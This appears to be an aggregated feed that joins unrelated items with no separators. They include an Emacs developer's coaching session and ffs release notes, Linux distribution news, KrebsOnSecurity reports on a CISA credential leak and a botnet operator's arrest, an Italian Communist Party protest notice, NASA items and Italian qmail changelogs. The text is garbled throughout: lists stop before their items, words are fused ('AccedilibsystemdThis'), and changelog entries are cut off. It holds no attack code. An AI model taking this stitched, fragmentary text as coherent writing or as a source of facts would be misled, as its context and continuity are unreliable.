In the recent weeks I've been engaging Prot as a coach to help review
my new ffs package for GNU Emacs as I worked on preparing it for
inclusion in GNU ELPA, as well as discussing other Emacs- and
life-related topics.
UPDATE 2026-05-23 22:39:15 -0400: Prot also published an article about our session on his website: https://protesilaos.com/commentary/2026-05-23-life-issues-and-philosophy-amin-bandali/
In our nearly 2-hour conversation, we discussed at length and in depth various aspects of life in the current times. For instance, feeling overwhelmed in the face of innumerable things happening at once, with technology changing our perception and making events feel proximate and imminent.
We talked about seasonality and rhythms in life, including in relation to burnout and knowing our own limitations, and descriptive vs prescriptive thinking when reflecting on the expectations we may place on our self when comparing our self to others through the lens of our necessarily-incomplete impressions and glimpses of their lives. We discussed absence or loss as a dual to presence or persistence in the process of life. How with our memories and through embodying the philosophy and teachings of departed loved ones their essence and legacy continues to live on within us. But also loss in the sense of us losing parts of our self in life-defining moments while preserving other parts and gaining new ones, being liberated of some of the burdens of our past self and in effect becoming someone else in the process.
In being true to our self, we talked about humans as multi-faceted beings and the importance of expressing and giving a voice to these different aspects of our self, and keeping alive that child-like sense of awe and wonder. To live a life where the pace and rhythms of our environment are in sync with our internal rhythms, and to not give others undue power over us or our happiness through trying to live according to their prescribed standards or expectations.
I also learned more about Prot's practical philosophy of situational awareness in life, not merely as a means for survival, but also as a way of appreciating all of the beauty that surrounds us, and a method for gaining the knowledge and skills to apply what we learn from patterns in one area of life to other areas.
We concluded our session with a mention to the concept of sanctity, to set aside a sacred time or place for our self wherein no distractions are allowed, where we can unwind, rest, and recharge for whatever comes next.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Like Prot, I am invigorated and inspired to live a full, honest life. To do my best, do what I do in earnest, and make the best of what I have.
Take care, and so long for now.
L'articolo Link WhatsApp diretto: come crearne uno con numero e messaggio precompilato proviene da FullPress.
Alpine Linux, one of the most recognizable non-systemd Linux distributions, is reportedly experimenting with an optional systemd compatibility layer, a move that has sparked intense discussion across the Linux community.
For years, Alpine has stood apart from mainstream Linux distributions by avoiding both glibc and systemd, instead relying on:
Now, growing software compatibility pressures, especially around desktop applications, containers, and enterprise tooling, appear to be pushing Alpine developers to explore new approaches.
Alpine Linux built its reputation around simplicity, security, and minimalism. Unlike many mainstream distributions, Alpine intentionally avoided systemd in favor of the lighter and more modular OpenRC init system.
This design philosophy made Alpine extremely popular for:
Its tiny footprint and reduced dependency chain became major advantages in cloud and container environments.
Despite Alpine’s popularity, avoiding systemd has increasingly created compatibility challenges.
Many modern Linux applications now assume the presence of:
AccedilibsystemdThis has become particularly problematic for:
Historically, Alpine users often relied on:
gcompatThe growing complexity of those workarounds appears to be one reason compatibility discussions are intensifying.
Importantly, Alpine Linux is not replacing OpenRC with systemd.
Instead, the project appears to be exploring:
libsystemd supportExperimental efforts already exist in the broader ecosystem. For example, unofficial projects have packaged portions of systemd, particularly libsystemd, for Alpine systems specifically to satisfy software dependencies without running full systemd services.
The Debian project has begun exploring AI-assisted bug triage workflows, joining a broader movement across the open-source world to manage the rapidly increasing volume of software bug reports and vulnerability submissions.
While Debian developers are approaching the idea cautiously, the effort reflects a growing reality for large open-source projects: modern software ecosystems are producing more bugs, duplicate reports, and security findings than human maintainers can efficiently process alone.
The discussion arrives during a period of intense debate within Linux and open-source communities about how artificial intelligence should be integrated into software development and maintenance.
Debian is one of the largest and most complex Linux distributions in existence, maintaining tens of thousands of software packages across multiple architectures and release branches. Managing bug reports at that scale has always been challenging.
Now, AI-assisted vulnerability scanning and automated testing tools are dramatically increasing report volumes across open-source projects. Maintainers are increasingly facing:
AI-assisted bug triage systems are being explored as a way to help organize, prioritize, and categorize incoming reports before human maintainers review them.
Importantly, Debian is not handing software maintenance over to AI systems.
Instead, AI-assisted triage generally focuses on repetitive administrative tasks such as:
The goal is to reduce the amount of manual sorting work maintainers must perform before actual debugging begins.
Debian’s experiments come during an ongoing debate about AI’s role in open-source development.
Some maintainers view AI-assisted tooling as necessary because software complexity has outpaced human review capacity. Others worry about:
The Debian community itself has spent months discussing how AI-assisted contributions should be handled, but no final project-wide policy has yet been adopted.
Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.
On May 18, KrebsOnSecurity reported that a CISA contractor with administrative access to the agency’s code development platform had created a public GitHub profile called “Private-CISA” that included plaintext credentials to dozens of internal CISA systems. Experts who reviewed the exposed secrets said the commit logs for the code repository showed the CISA contractor disabled GitHub’s built-in protection against publishing sensitive credentials in public repos.
CISA acknowledged the leak but has not responded to questions about the duration of the data exposure. However, experts who reviewed the now-defunct Private-CISA archive said it was originally created in November 2025, and that it exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository.
In a written statement, CISA said “there is no indication that any sensitive data was compromised as a result of the incident.” But in a May 19 a letter (PDF) to CISA’s Acting Director Nick Andersen, Sen. Maggie Hassan (D-NH) said the credential leak raises serious questions about how such a security lapse could occur at the very agency charged with helping to prevent cyber breaches.
“This reporting raises serious concerns regarding CISA’s internal policies and procedures at a time of significant cybersecurity threats against U.S. critical infrastructure,” Sen. Hassan wrote.
A May 19 letter from Sen. Margaret Hassan (D-NH) to the acting director of CISA demanded answers to a dozen questions about the breach.
Sen. Hassan noted that the incident occurred against the backdrop of major disruptions internally at CISA, which lost more than a third of it workforce and almost all of its senior leaders after the Trump administration forced a series of early retirements, buyouts, and resignations across the agency’s various divisions.
Rep. Bennie Thompson (D-MS), the ranking member on the House Homeland Security Committee, echoed the senator’s concerns.
“We are concerned that this incident reflects a diminished security culture and/or an inability for CISA to adequately manage its contract support,” Thompson wrote in a May 19 letter to the acting CISA chief that was co-signed by Rep. Delia Ramirez (D-Ill), the ranking member of the panel’s Subcommittee on Cybersecurity and Infrastructure Protection. “It’s no secret that our adversaries — like China, Russia, and Iran — seek to gain access to and persistence on federal networks. The files contained in the ‘Private-CISA’ repository provided the information, access, and roadmap to do just that.”
KrebsOnSecurity has learned that more a week after CISA was first notified of the data leak by the security firm GitGuardian, the agency is still working to invalidate and replace many of the exposed keys and secrets.
On May 20, KrebsOnSecurity heard from Dylan Ayrey, the creator of TruffleHog, an open-source tool for discovering private keys and other secrets buried in code hosted at GitHub and other public platforms. Ayrey said CISA still hadn’t invalidated an RSA private key exposed in the Private-CISA repo that granted access to a GitHub app which is owned by the CISA enterprise account and installed on the CISA-IT GitHub organization with full access to all code repositories.
“An attacker with this key can read source code from every repository in the CISA-IT organization, including private repos, register rogue self-hosted runners to hijack CI/CD pipelines and access repository secrets, and modify repository admin settings including branch protection rules, webhooks, and deploy keys,” Ayrey told KrebsOnSecurity. CI/CD stands for Continuous Integration and Continuous Delivery, and it refers to a set of practices used to automate the building, testing and deployment of software.
KrebsOnSecurity notified CISA about Ayrey’s findings on May 20. Ayrey said CISA appears to have invalidated the exposed RSA private key sometime after that notification. But he noted that CISA still hasn’t rotated leaked credentials tied to other critical security technologies that are deployed across the agency’s technology portfolio (KrebsOnSecurity is not naming those technologies publicly for the time being).
CISA responded with a brief written statement in response to questions about Ayrey’s findings, saying “CISA is actively responding and coordinating with the appropriate parties and vendors to ensure any identified leaked credentials are rotated and rendered invalid and will continue to take appropriate steps to protect the security of our systems.”
Ayrey said his company Truffle Security monitors GitHub and a number of other code platforms for exposed keys, and attempts to alert affected accounts to the sensitive data exposure(s). They can do this easily on GitHub because the platform publishes a live feed which includes a record of all commits and changes to public code repositories. But he said cybercriminal actors also monitor these public feeds, and are often quick to pounce on API or SSH keys that get inadvertently published in code commits.
The Private-CISA GitHub repo exposed dozens of plaintext credentials to important CISA GovCloud resources.
In practical terms, it is likely that cybercrime groups or foreign adversaries also noticed the publication of these CISA secrets, the most egregious of which appears to have happened in late April 2026, Ayrey said.
“We monitor that firehose of data for keys, and we have tools to try to figure out whose they are,” he said. “We have evidence attackers monitor that firehose as well. Anyone monitoring GitHub events could be sitting on this information.”
James Wilson, the enterprise technology editor for the Risky Business security podcast, said organizations using GitHub to manage code projects can set top-down policies that prevent employees from disabling GitHub’s protections against publishing secret keys and credentials. But Wilson’s co-host Adam Boileau said it’s not clear that any technology could stop employees from opening their own personal GitHub account and using it to store sensitive and proprietary information.
“Ultimately, this is a thing you can’t solve with a technical control,” Boileau said on this week’s podcast. “This is a human problem where you’ve hired a contractor to do this work and they have decided of their own volition to use GitHub to synchronize content from a work machine to a home machine. I don’t know what technical controls you could put in place given that this is being done presumably outside of anything CISA managed or even had visibility on.”
Update, 3:05 p.m. ET: Added statement from CISA. Corrected a date in the story (Truffle Security said it found the repo gained some of its most sensitive secrets in late April 2026, not 2025).
Domani sabato 23 Maggio alle ore 10.30 a Cesena si terrà il presidio presso l’area parcheggio piastra – Ospedale Bufalini. Organizzato dal Partito Comunista – Cesena
Per ricordare come l’invio di armi in una guerra fatta per procura stia massacrando il nostro paese, nella sanità e non solo!
L’Italia verserà altri 13 miliardi di euro per continuare ad armare l’Ucraina e alimentare la guerra.
• 700 miliardi di euro per acquistare gas liquefatto statunitense, fino a quattro volte più costoso di quello russo.
• 800 miliardi destinati al riarmo dell’Unione Europea.
• 42 miliardi per il riarmo dell’Italia, decisi dal Governo Meloni con il consenso dell’opposizione di centrosinistra.
Tutto questo mentre milioni di cittadini rinunciano a curarsi o sono costretti a indebitarsi per sostenere i costi delle terapie. Mancano medici e infermieri, mentre ogni anno oltre 360.000 persone si ammalano di cancro e necessitano di cure e assistenza adeguate.
Crescono le malattie professionali, gli infortuni e le morti sul lavoro, spesso causati dalla mancanza di prevenzione e controlli.
Salari bloccati, pensioni insufficienti, licenziamenti, cassa integrazione, piccoli artigiani e commercianti in difficoltà: questa è la realtà del Paese.
Nel frattempo, banche, multinazionali e industrie belliche continuano ad accumulare profitti.
BASTA!
Fermiamo il folle disegno dell’Unione Europea che punta a un confronto diretto con la Russia.
• NO all’invio di armi in Ucraina.
• NO al riarmo UE/NATO.
• NO alle sanzioni contro la Russia.
CONTRO LA GUERRA per LA PACE!
Contribuisci al Partito Comunista con una piccola sottoscrizione:
Iscriviti al Partito Comunista:
Segui il Partito Comunista sui social:
Ascolta il nostro podcast su tutte le piattaforme:L'articolo Cesena, presidio del Partito Comunista contro guerra e riarmo davanti all’Ospedale Bufalini proviene da IL PARTITO COMUNISTA - Sito Ufficiale.
4 min read
From high‑speed research flights to high‑altitude science campaigns, NASA depends on aircraft that perform at their best and the ground crews who keep them mission ready.
At NASA’s Armstrong Flight Research Center in Edwards, California, specially trained maintenance crews are essential to keeping the agency’s aircraft flying safely and reliably.
This year, NASA added two F-15s and a Pilatus PC-12 to its fleet at Armstrong. These aircraft – alongside platforms such as the high-altitude ER-2s and NASA’s newest X-plane, the X-59 – reflect a wide range of capabilities. The maintenance staff is responsible for keeping each one mission ready.
“That’s the beauty of our Armstrong maintenance teams. They adapt to any type of change,” said Jose “Manny” Rodriguez, NASA Armstrong Gulfstream G-IV crew chief. “One day you could have an instrument being loaded, and the next day it may be aircraft reconfiguration, all while other aircraft systems may need fixing. They adapt and they overcome any situation.”
Each aircraft supports a specific mission, whether it’s conducting science research, serving as a support or chase aircraft, or assisting NASA rocket launches. The aircraft fly at different speeds, carry specialized hardware, and require maintenance crews to stay agile with fast-paced changes.
To ensure NASA can make aeronautics and science advancements safely, the crews work continuously, checking on the ejection seats, filling the tanks with fuel, and changing out brakes, wheels, wiring, and hardware constantly, all of which can degrade with each flight.
On any given day, an aircraft may be flight-ready for a mission, undergoing scheduled maintenance or modifications, or down for longer-term care.
There are typically multiple NASA Armstrong aircraft in the air in one day. Currently, the center’s C-20A is flying in Peru and Panama, the X-59 is often flying twice per day with a chase plane, and the center’s ER-2 is flying in Colorado, supporting the Geological Earth Mapping Experiment (GEMx). All this work is happening at the same time, and Armstrong’s skilled maintenance staff is prepping and fixing aircraft as needed along the way.
The team includes mechanics with both military and civilian backgrounds, and the job involves a lot of on-the-job training.
Maintenance crews are composed of:
After the maintenance crew ensures the aircraft is in the best condition possible, the team tows it out to the flightline, and it becomes ready for operations. The NASA pilot assigned to the mission will walk around the aircraft with the assigned crew chief for a final safety check before flight.
“There is a crew chief assigned to every aircraft,” Rodriguez said. “The crew chief is responsible for the integrity of that aircraft, and at the end of the day, his signature and the pilot’s together are what constitutes that the aircraft is safe for flight.”
Maintenance crews track each flight to help ensure it completes the mission without returning early. If an aircraft does return to base early, the maintenance team stands ready. When it lands, the crew is right there again, helping the research team complete the mission and fixing whatever is needed to stay nimble and ready for the next flight.
“It’s difficult at times to work with different airplanes from both the civilian and military sides, but it’s very rewarding to see that we have the capability and the expertise to keep these aircraft flying,” Rodriguez said.
Editor’s Note: This advisory was updated May 22, 2026 to include a retirement.
NASA announced Friday an agencywide realignment to increase mission focus and move out on the National Space Policy. These changes position the agency to better deliver on the nation’s highest‑priority objectives with speed and efficiency.
During the Ignition event in late March, NASA Administrator Jared Isaacman and agency leaders outlined the most pressing objectives to deliver on the next chapter of American leadership in space. President Trump’s Executive Order Ensuring American Space Superiority, otherwise known as the National Space Policy, directed NASA to focus talent and resources on objectives including accelerating the Artemis program, establishing a Moon Base, developing a nuclear space reactor, igniting the orbital economy, and expanding missions of science and discovery.
To support the agency’s ambitious short- and long-term goals, NASA is taking action to increase specialization at centers and integrate mission directorates, elevating delivery of technically excellent work. Some of these actions include:
“This initiative reflects NASA’s extreme focus on executing the mission in direct support of the National Space Policy. We are focusing resources on the most pressing objectives only NASA is capable of undertaking and liberating the workforce from unnecessary bureaucracy and obstacles that impede progress. We aim to rebuild competencies and instill a culture that attracts the best and brightest capable of pursuing the most demanding engineering challenges and moving safely and urgently,” said Isaacman. “There will be no reduction in force, no program cancellations, no closures, but we will achieve cost savings through more efficient execution and taking an active role in delivering the outcomes the world has been waiting for from NASA. This is how we deliver on the mission, meet the moment, and continue to make history on behalf of the American people.”
Mission directorate realignment is as follows:
Additional leadership roles, in alphabetical order, include:
Leadership at unlisted centers remains unchanged.
For more, please visit:
https://www.nasa.gov/nasa-leadership
-end-
Bethany Stevens / Camille Gallo
Headquarters, Washington
202-358-1600
bethany.c.stevens@nasa.gov / camille.m.gallo@nasa.gov
Il video presenta la nuova app PROASSIST 4.0 che monitora i parametri dei pazienti a distanza. Gli operatori tracciano ogni intervento in tempo reale per offrire un’assistenza mirata. È il progetto Fragilità Sostenuta a Domicilio: tecnologia e cura che lavorano insieme per le persone fragili. Un'iniziativa di SmartHUB, il laboratorio di innovazione nato a Firenze dalla collaborazione tra Fondazione CR Firenze, che oltre a promuovere l’iniziativa la sostiene, Università degli Studi di Firenze, Azienda USL Toscana CentroSocietà della Salute, Fondazione PIN e Medea Srl.
Il video presenta la nuova app PROASSIST 4.0 che monitora i parametri dei pazienti a distanza. Gli operatori tracciano ogni intervento in tempo reale per offrire un’assistenza mirata. È il progetto Fragilità Sostenuta a Domicilio: tecnologia e cura che lavorano insieme per le persone fragili. Un'iniziativa di SmartHUB, il laboratorio di innovazione nato a Firenze dalla collaborazione tra Fondazione CR Firenze, che oltre a promuovere l’iniziativa la sostiene, Università degli Studi di Firenze, Azienda USL Toscana CentroSocietà della Salute, Fondazione PIN e Medea Srl.
Conclusa la conferenza annuale sui temi dell’etica digitale, dell’autonomia tecnologica e del futuro condiviso della ricerca a Pisa dal 19 al 21 maggio 2026.
Italian Linux Society ha attivato il nuovo conto in Banca Etica e iniziamo l'abbandono di Unicredit. I motivi.
Continua la lettura… (ulteriori 7 minuti di lettura)
L’epoca d’oro dei bug bounty potrebbe stare entrando in una nuova fase molto più complessa. HackerOne, una delle piattaforme più importanti al mondo per la segnalazione responsabile di vulnerabilità, ha drasticamente ridotto le ricompense economiche del proprio programma Internet Bug Bounty (IBB), provocando forti reazioni nella comunità dei ricercatori di sicurezza. Secondo quanto riportato da […]
L'articolo HackerOne taglia drasticamente le ricompense dei bug bounty proviene da Securityinfo.it.
Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.
A criminal complaint unsealed today in an Alaska district court charges Jacob Butler, a.k.a. “Dort,” of Ottawa, Canada with operating the Kimwolf DDoS botnet. A statement from the Department of Justice says the complaint against Butler was unsealed following the defendant’s arrest in Canada by the Ontario Provincial Police pursuant to a U.S. extradition warrant. Butler is currently in Canadian custody awaiting an initial court hearing scheduled for early next week.
The government said Kimwolf targeted infected devices which were traditionally “firewalled” from the rest of the internet, such as digital photo frames and web cameras. The infected systems were then rented to other cybercriminals, or forced to participate in record-smashing DDoS attacks, as well as assaults that affected Internet address ranges for the Department of Defense. Consequently, the DoD’s Defense Criminal Investigative Service is investigating the case, with assistance from the FBI field office in Anchorage.
“KimWolf was tied to DDoS attacks which were measured at nearly 30 Terabits per second, a record in recorded DDoS attack volume,” the Justice Department statement reads. “These attacks resulted in financial losses which, for some victims, exceeded one million dollars. The KimWolf botnet is alleged to have issued over 25,000 attack commands.”
On March 19, U.S. authorities joined international law enforcement partners in seizing the technical infrastructure for Kimwolf and three other large DDoS botnets — named Aisuru, JackSkid and Mossad — that were all competing for the same pool of vulnerable devices.
On February 28, KrebsOnSecurity identified Butler as the Kimwolf botmaster after digging through his various email addresses, registrations on the cybercrime forums, and posts to public Telegram and Discord servers. However, Dort continued to threaten and harass researchers who helped track down his real-life identity and dramatically slow the spread of his botnet.
Dort claimed responsibility for at least two swatting attacks targeting the founder of Synthient, a security startup that helped to secure a widespread critical security weakness that Kimwolf was using to spread faster and more effectively than any other IoT botnet out there. Synthient was among many technology companies thanked by the Justice Department today, and Synthient’s founder Ben Brundage told KrebsOnSecurity he’s relieved Butler is in custody.
“Hopefully this will end the harassment,” Brundage said.
An excerpt from the criminal complaint against Butler, detailing how he ordered a swatting attack against Ben Brundage, the founder of the security firm Synthient.
The government says investigators connected Butler to the administration of the KimWolf botnet through IP address, online account information, transaction records, and online messaging application records obtained through the issuance of legal process. The criminal complaint against Butler (PDF) shows he did little to separate his real-life and cybercriminal identities (something we demonstrated in our February unmasking of Dort).
In April, the Justice Department joined authorities across Europe in seizing domain names tied to nearly four-dozen DDoS-for-hire services, although because of a bureaucratic mix-up the list of seized domains has remain sealed until today. The DOJ said at least one of those services collaborated with Butler’s Kimwolf botnet.
A statement from the Ontario Provincial Police said a search warrant was executed on March 19 at Butler’s address in Ottawa, where they seized multiple devices. As a result of that investigation, Butler was arrested and charged this week with unauthorized user of computer; possession of device to obtain unauthorized use of computer system or to commit mischief; and mischief in relation to computer data. He is scheduled to remain in custody until a hearing on May 26.
In the United States, Butler is facing one count of aiding and abetting computer intrusion. If extradited, tried and convicted in a U.S. court, Butler could face up to 10 years in prison, although that maximum sentence would likely be heavily tempered by considerations in the U.S. Sentencing Guidelines, which make allowances for mitigating factors such as youth, lack of criminal history and level of cooperation with investigators.
ffs provides a minor mode for simple plain text presentations in
Emacs, where the slides are separated using the page-delimiter, by
default the form feed character (^L).
I wrote ffs in early 2022 for my LibrePlanet 2022 presentation the
Net beyond the Web, and earlier this year decided to polish it towards
being a proper package and submit it to GNU ELPA. The manual still
needs some more work, but the overall package is in pretty good shape
so I submitted for inclusion in GNU ELPA.
ffs
ffs and I owe a debt of gratitude to Protesilaos for rounds of
code review and feedback for improving and polishing the package in
preparation for submission to GNU ELPA. You can watch videos of these
sessions posted earlier on my website:
Further, inspiration for parts of ffs's implementation was
gratefully drawn from Protesilaos's Logos package for Emacs.
Dedicated to the loving memory of Farangis Yousefinia.
Below are the release notes.
First release of ffs on GNU ELPA.
The attempted build of ffs 0.2.1 within GNU ELPA build sandbox failed
with an Error: void-function (org-texinfo-kbd-macro) due to use of
#+macro: kbd (eval (org-texinfo-kbd-macro $1)) in ffs.org for better
formatting of key sequences in the exported Texinfo copy. This seems
to have happened for the specific case of generating a plain text
README using ox-ascii where ELPA didn't load ox-texinfo. To try
and mitigate this, a README.md has been added for use as the package
README instead of ffs.org. If not sufficient, a Texinfo copy of the
ffs manual will be shipped instead of the Org one in the next release.
ffs 0.2.2 also includes small fixes and improvements throughout
ffs.el from Stefan Monnier, and additional feedback to be addressed
in future releases.
The attempted build of ffs 0.2.0 within GNU ELPA build sandbox failed with a "Cannot include file" error on the "#+include: fdl.org" in the manual. So, as a workaround, we switch to using the official Texinfo copy of the GNU FDL license rather than an Org copy.
First release of ffs intended for GNU ELPA.
After a few years of inactivity, in early 2026 I decided to dust off
ffs.el, polish and document it, and offer for inclusion in GNU ELPA
as a proper package.
ffs-default-face-height changed to nil
To minimize unexpected and/or unnecessary changes out-of-the-box, the
default value of ffs-default-face-height has been changed to nil.
ffs-edit-buffer-name demoted from user option to variableThis is not an important user-facing setting, so to help avoid overwhelming users with many options, this has been demoted from a user option to a variable.
ffs's behaviour
As part of the effort to bring ffs more in line with the conventions
of other existing Emacs packages, the mechanisms for toggling various
parts of Emacs's interface to minimize visual clutter were changed
from being minor modes to being customizable user options. These are
the replacement new user options, with a default value of nil:
ffs-hide-cursorffs-hide-mode-lineffs-hide-header-line
Their value is buffer-local, and may be set globally using
setq-default. See the sample configuration in the manual for an
example of how to customize them.
The new ffs-page-delimiter user option defines the page delimiter
inserted by ffs-edit-done when inserting a new slide. Emacs's
page-delimiter regexp should be able to match ffs-page-delimiter's
value, so if you use a custom page-delimiter be sure to customize
ffs-page-delimiter accordingly.
The new ffs-echo-progress user option controls whether to display in
echo area the progress through the slides. When non-nil, changing
slides will also display the progress through the slides in the echo
area. The format of the displayed progress can be customized using
the new ffs-echo-progress-format user option.
The new ffs-edit-display-buffer-alist user option may be used to
control the Window configuration for the ffs-edit buffer. By
default, it will display the ffs-edit buffer in the same window.
The new ffs-edit-done-hook user option may be used to define hooks
to be run at the end of ffs-edit-done after returning to the main
ffs presentation buffer.
Lastly, a new ffs-find-speaker-notes-function variable was added to
allow customizing the find function used for opening the speaker's
notes file, defaulting to find-file-other-frame.
Initial publication of ffs.el as part of my personal configurations
for GNU Emacs.
My first attempt at this concept was a now-archived ffsanim.el,
a major mode implementation that used Emacs's animate library to
animate slide texts onto the screen. Shortly after realizing the
shortcomings of that approach, I abandoned it in favour a minor mode
implementation and published version 0.1.0 of what is now ffs in
my personal configs repository.
I used this implementation for presenting my LibrePlanet 2022 talk, The Net beyond the Web.
I picked "ffs" as the package name, the acronym for form feed slides.
Ubuntu Core 26 could be a game-changer for organizations looking for increased security and reliability.
OpenTelemetry (fondly known as OTel) is an open-source project that provides a unified set of APIs, libraries, agents, and instrumentation to capture and export logs, metrics, and traces from applications. The project’s goal is to standardize observability across various services and applications, enabling better monitoring and troubleshooting.
The post Using OpenTelemetry and the OTel Collector for Logs, Metrics, and Traces appeared first on Linux.com.
Open Day dell'Offerta formativa dell’Università degli Studi di Firenze, un appuntamento dedicato a studenti, famiglie e a tutti coloro che vogliono conoscere da vicino il mondo universitario e le opportunità formative offerte dall’Ateneo fiorentino. L’evento si terrà martedì 14 luglio 2026, dalle ore 9 alle 13, presso la Fondazione PIN – Polo di Prato dell’Università di Firenze.
Open Day dell'Offerta formativa dell’Università degli Studi di Firenze, un appuntamento dedicato a studenti, famiglie e a tutti coloro che vogliono conoscere da vicino il mondo universitario e le opportunità formative offerte dall’Ateneo fiorentino. L’evento si terrà martedì 14 luglio 2026, dalle ore 9 alle 13, presso la Fondazione PIN – Polo di Prato dell’Università di Firenze.
dovecot_config_version and dovecot_storage_version in dovecot.conflua as a dependency. Added --without-lua at configure commanduserdb iterate query nor orders by domain and username commitfts_autoindex = no added to Trash and Junk folders commit+ character added to auth_username_chars commitvpopmail configured with --disable-many-domainsRoundcube è una webmail avanzata con una bella interfaccia grafica.
$config['quota_zero_as_unlimited'] = true; to show quota unlimited instead of unknown for accounts with unlimited quota
qmailctlqmHandle, queue_repair and all scripts installed in QMAIL/bin and not in /usr/local/bin by config-all.shqmailctl script, DKIM control/filterargs and control/domainkeys dir, SURBL, smtpplugins, helodnscheck spp plugin, svtools, qmHandle, queue-repair, SSL key file (optional). Server Name Indication (SNI) è una estensione del protocollo TLS che consente a un server di presentare differenti certificati a seconda dell'hostname richiesto dal client durante il saluto TLS.
In un ambiente email moderno, molti domini condividono uno stesso indirizzo IP per i servizi SMTP, IMAP, POP3 e submission. Senza SNI, un amministratore di un server email può presentare un solo certificato per ogni socket disponibile, cosa che obbliga l'aministratore ad affidarsi a certificati multi-dominio (SAN) o a certificati con wildcard. Questo approccio aumenta i problemi operativi tra gli utenti finali novelli, che spesso non sono in grado di usare la configurazione automatica del client per configurare correttamente le loro mailbox.
L'abilitazione di SNI nei serivizi mail consente al server di presentare il certificato appropriato basato sull'hostname richiesto dal client, contenuto nel suo indirizzo email.
La funzionalità SNI per la mia distribuzione qmail è stata aggiunta da Andreas Gerstlauer (commit qui e qui), che vorrei ringraziare.
Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.
vpopmail: 5.6.13Vpopmail fornisce un modo semplice di gestire indirizzi di posta su domini virtuali e account email diversi da quelli su /etc/passwd.
vmysql.c changes (#10)
valias_create_table now check if table is already created in order to avoid warnings in dotqmail2valiasvalias_insert functionqmailadmin calls in #9s/qmail users (look here)--enable-defaultdelivery) changes (more info here, commit):
vdelivermail is installed by default in .qmail-default of newly created domains with option 'delete' as in the previous version.vdelivermail, to avoid loops.VqAdmin è un pannello di controllo su interfaccia web che consente di eseguire azioni che richiedono l'accesso a root — per esempio, aggiungere e cancellare domini.
Come si può vedere, VqAdmin ha una nuova versione con un nuovo aspetto mobile responsive, con tutte le mie vecchie patch incluse (compresa quella di ALI) e diverse correzioni e ripuliture del codice sorgente. Ho risolto tutti i warnings sia di autotools che di gcc e cambiato un paio di cose per poter rifare il tema html (guardare il changelog per maggiori dettagli). Come sempre i contributi nei commenti sono graditi.
PS: anche la parte apache è stata modificata e prima di fare l'aggiornamento è necessario guardare quali modifiche sono necessarie.
Have fun!
Questa pagina riguarda la patch DKIM inclusa nella mia patch combinata (maggiori informazioni qui). Questo argomento è avanzato ed è consigliabile tornare qui alla fine del tutto.
DKIM fornisce un metodo per validare l'identità di un nome a dominio associato a un messaggio con una autenticazione crittografata. La tecnica di validazione è basata sulla crittografia di una chiave pubblica: Il server che invia l'email aggiunge il nome a dominio al messaggio e vi affigge una firma digitale. Questa chiave è posta nell'intestazione DKIM-Signature: del messaggio. Colui che riceve il messaggio può controllare la validità della chiave pubblica leggendo un record TXT del DNS del dominio associato al messaggio.
Sei invitato a dare un'occhiata alle pagine man a partire da qmail-dkim(8) e spawn-filter(8).
ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)ed25519 support (RFC 8463)DKIMSIGN / DKIMSIGNEXTRA / DKIMSIGNOPTIONS DKIMSIGNOPTIONSEXTRA variablesdomainkey script replaced by dknewkey in order to create ed25519 keys and rsa keys with 1024/2048/4096 bitlibdomainkeys.a library)rsa key together with the ed25519 key below.
qmail-sppprovides plug-in support for qmail-smtpd. It allows you to write external programs and use them to checkSMTPcommand argument validity. The plug-in can trigger several actions, like denying a command with an error message, logging data, adding a header and much more.
Today I played for the first time with an ancient patch for qmail: qmail-spp. I was really impressed for the ease of use and the elegance of its code, which is inserted inside qmail-smtpd.c with a few touches, despite of the many things that it can do when installed and enabled.
It can run a custom plugin in any language and at any level of the smtp session, grabbing the environment variables, writing into stderr or blocking the smtp session with a return error for the sender.
In no time at all I managed to understand its logic and write a small plugin by adapting a c program I wrote for s/qmail a few months ago to check the validity of the recipient.
Of course I decided to add this patch to my combo. I've just modified the way it has to be enabled, just not to bother those who don't want to touch their run scripts. So, while the original patch is enabled by default, I modified things a little bit so that you have to manually enable it by exporting the variable ENABLE_SPP in your run scripts. Therefore the original NOSPP variable is useless.
Have fun!
Ora che abbiamo preparato i filtri antispam dobbiamo addestrare il nostro sistema bayesiano e inviare i report a Razor, Pyzor e Spamcop.
La cosa più ovvia che può venirci in mente di fare a questo punto è forse quella di lanciare sa_learn e spamassassin --report uno dopo l'altro al click sul bottone "Marca come Spam" della webmail Roundcube (vedere i driver cmd_learn e multi_driver del plugin markasjunk), ma questa scelta ha alcuni svantaggi importanti:
E' qundi più corretto eseguire questi due compiti durante la notte per mezzo di un cronjob (primo problema risolto), processando i soli messaggi di vero spam/ham che l'utente ha consapevolmente copiato in una cartella apposita (secondo problema).
Tired of the nightmares of remotely compiling the kernel with Linux-VServer, a software that I'm pleased with despite of some lack of documentation, these days I was playing with LXC, which is included and supported by Slackware and for which the Linux kernel doesn't need any patching because it already embeds the hacks for LXC containers.
To convert an existing Linux-VServer container in a (eventually unprivileged) LXC container you can follow these steps. I assume that you already know how to create an LXC container; in case you are interested in unprivileged containers take a look to the excellent Chris Willing's guide (a big thanks to him) linked below.
More info:
Era ora che riuscissi a liberarmi della vecchia piattaforma Drupal come strumento per questo blog, ma finalmente ho trovato il tempo per migrare il database di Drupal e per riprendere qui la vecchia grafica (solo lo stile, il codice html è mio).
D'altronde, da almeno 15 anni porto avanti lo sviluppo di un mio CMS (basato su php/mariadb), che però originariamente non avevo usato per la mancanza del tempo necessario a costruirmi un tema html.
Ora il sito vive in ambiente Mobile Responsive e soprattutto mi consente di svincolarmi dagli incubi degli aggiormanti di Drupal e dei suoi pacchetti.
La parte sui commenti del presente CMS non è perfettamente collaudata e mi farebbe piacere avere eventualmente dei feedback su ogni problematica, quindi non esitate a scrivermi al riguardo.
Buon divertimento!
